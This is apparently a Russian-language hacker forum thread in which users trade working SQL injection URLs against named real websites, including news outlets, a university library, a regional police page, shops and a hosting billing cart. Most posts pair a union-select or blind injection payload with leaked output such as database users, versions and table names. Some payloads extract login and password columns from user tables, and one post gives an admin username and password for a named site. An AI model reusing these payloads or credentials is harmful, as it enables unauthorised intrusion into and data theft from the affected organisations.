SQL Инъекции

insanely-great.com PR-5

Code:

www.insanely-great.com/news.php?id=-11189+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+

Code:

5.0.77-log:[email protected]:flamini_igm

innovid.com PR-5

Code:

http://www.innovid.com/news.php?itemID=52+and+5=substring((SELECT+version()),1,1)+--+

library.uni-altai.ru ТИЦ-180

Code:

library.uni-altai.ru/FullNews/shownew.php?num=-1253+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11+--+

Code:

5.1.49-3-log:serg@localhost:libnews

 

Code:

http://www.nov-mvd.ru/GUVDpoNSO/Statistika?blogs2_id=552+limit+0+union+select+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6

Web Server: Apache/2.0.63-lk.d (Unix) mod_ssl/2.0.63-lk.d OpenSSL/0.9.8g mod_dp20/0.99.2 mod_python/3.3.1 Python/2.5.1 mod_ruby/1.2.6 Ruby/1.8.6(2007-09-24)

DB Server: MySQL
Current DB: notixshoru_mvd

 

Code:

http://www.zebra.nsk.ru/index.php?page=lotinfo&id=-9277+union+select+1,2,concat_ws(0x3a3a3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+

zebransk_base@localhost:::5.1.50-rel11.4-log:::zebra777_base

 

тиЦ 800 PR 5

vns@localhost:5.1.53-log:www

тиЦ 160 PR 4

printmag@localhost:wwwprintmagazinr:4.1.25-log

тиЦ 30 PR 3

200148610@localhost:4.1.25-log:db00148610

тиЦ 30 PR 3

[email protected]:5.0.90-log:u25499

 

не знаю куда постить админки и запостил тут!

Code:

http://www.konkir.ru/

модеры если у меня глаза не видят то сорри,перенесите туда где должно быть!
root:market2004

 

тиЦ 1000 PR 4

maxybaby_root@localhost:maxybaby_maximka:5.0.51a-24+lenny5 "4"

 

Равнодушным к РУ-АвтоПрому посвящается...
www.la[g]da.ru
PR/TYC = 6/1700
DB: Oracle

Базы

Code:

http://www.la[g]da.ru/carco[g]lors.php?ba[g]se_id=6295171 AND ASCII(SUBSTR((SELECT NVL(CAST(COUNT(DISTINCT(OWNER)) AS VARC[g]HAR(4000)),CHR(32)) FROM SYS.ALL_TABLES),1,1)) > 51

Таблицы

Code:

http://www.la[g]da.ru/ca[g]rcolors.php?ba[g]se_id=6295171 AND ASCII(SUBS[g]TR((SELECT NVL(CAST(TABLE_NAME AS VARCHAR(4000)),CHR(32)) FRO[g]M (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER=CHR(68)||CHR(83)||CHR(79)) WHERE LIMIT=4),6,1)) = 68

Колонки

Code:

http://www.la[g]da.ru/carco[g]lors.php?ba[g]se_id=6295171 AND ASCII(SUBSTR((SEL[g]ECT NVL(CAST(COUNT(COLUMN_NAME) AS VARCHAR(4000)),CHR(32)) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=CHR(68)||CHR(90)||CHR(79)||CHR(95)||CHR(85)||CHR(83)||CHR(69)||CHR(82)),1,1)) > 48

PHP:

databases [9]:
 CTXSYS
 DSO <-- default
 DSO1
 DSOTMP
 EXFSYS
 MDSYS
 OUTLN
 SYS
 SYSTEM


 

willkommen-tv.at PR-5

Code:

http://www.willkommen-tv.at/artikel.php?id=8+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9+--+

Code:

4.0.27inode:[email protected]:wi000142_0001

netporn.nl alexa-34k

Code:

http://www.netporn.nl/uprofile.php?UID=70796+and+5=substring((SELECT+version()),1,1)

surfbirds.com PR-5

Code:

http://surfbirds.com/video2/uprofile.php?UID=1045+UnIon+selECt+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+--+

Code:

5.0.83-rs-log:surfbirds_vshare@localhost:surfbirds_videoshare

 

тиЦ 650 PR 5

Code:

http://zvezda.ru/news_read.php?id=-9999999/**/union/**/select/**/concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,2,3,4,5,6,7,8,9+--+

antares_user@localhost:antares_DB:5.0.92-community

Code:

http://zvezda.ru/news_read.php?id=-9999999/**/union/**/select/**/group_concat%28table_name%29,2,3,4,5,6,7,8,9/**/from/**/information_schema.tables+--+

 

Единая Россия. Тамбов.

 

тиЦ 80 PR 6

Code:

http://sundaytimes.lk/financenews/articleXYZ100000010.php?id=-1+union+select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,2,3,4,5,6,7,8--+

suntimes_sunday@localhost:suntimes_suntimes:5.0.92-community

Code:

http://sundaytimes.lk/financenews/articleXYZ100000010.php?id=-1+union+select+group_concat%28table_name%29,2,3,4,5,6,7,8+from+information_schema.tables--

тиЦ 10 PR 5

Code:

http://www.financierworldwide.com/gp.php?id=99999999+union+select+1,2,3,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,5,6,7--+

financierworld@localhost:financierworld:4.1.20-community-nt

 

ПРосто хостер

https://www.host.co.in/hostbill/shoppingcart.php?gid=-5%27+union+select+1,2,3,user%28%29,version%28%29,6,7,8,9,database%28%29,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,61,62,63,64,65,66--+

 

увеличил на 4 символа (глюк форума)

 

тиЦ 10 PR 3

Code:

http://www.allpartners.ru/shops.php?id=99999999+union+select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,2,3,4,5,6,7--+

ronis@localhost:wwwpultlggru:5.1.25-rc-log

Code:

http://www.allpartners.ru/shops.php?id=99999999+union+select+group_concat%28table_name%29,2,3,4,5,6,7+from+information_schema.tables--

тиЦ 10 PR 6

Code:

http://www.pierce.ctc.[COLOR=Red][B]edu[/B][/COLOR]/pubs/thepen/print.php?id=99999999+union+select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,2,3--+

newsletter@localhost:newsletter:5.1.36-community

Code:

http://www.pierce.ctc.edu/pubs/thepen/print.php?id=-99999999+union+select+group_concat%28table_name%29,2,3+from+information_schema.tables--

 

4 символа

ещё 1

 

5.1.49-rel11.3-log
vibirai@localhost

DB: vibirai_lux

 

Выбераите что интересно вам

Code:

http://www.handspc.ru/soft/soft.php?id=183/**/union/**/select/**/1,version%28%29,3,4,5,6,7%20,8,9,10,11,12,13,14,table_name,16,17,18,19,20,21,22,23,24,25,26,27/**/from/**/information_schema.tables/**/--/**/

ЮЗЕРЫ

Code:

http://www.handspc.ru/soft/soft.php?id=183/**/union/**/select/**/1,version%28%29,3,user%28%29,5,6,7,8,9,10,11,12,13,14,concat_ws%280x3a,id,login,password%29,16,17,18,19,20,21,22,23,24,25,26,27/**/from/**/auth_tld/**/--/**/

Вот ещё 1, только тут думать надо, мне лень

Code:

http://job.saleone.ru/findrezum.php?a=2&id_rezum=705+order+by+18

И ещё 1, всё как надо.

Code:

http://efamily.ru/index.phtml?aid=-733+union+select+1,user%28%29,version%28%29,4,concat_ws%280x3a,ID,user_login,user_pass,user_email%29,6,7,8,9,9+from+wp_users+--+&id=101&page=40003

и ещё

Code:

http://www.europa.fm/ru/index.html?c=about&id=-1+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables+limit%200,1--

(Ночка без шелов... стыдно...)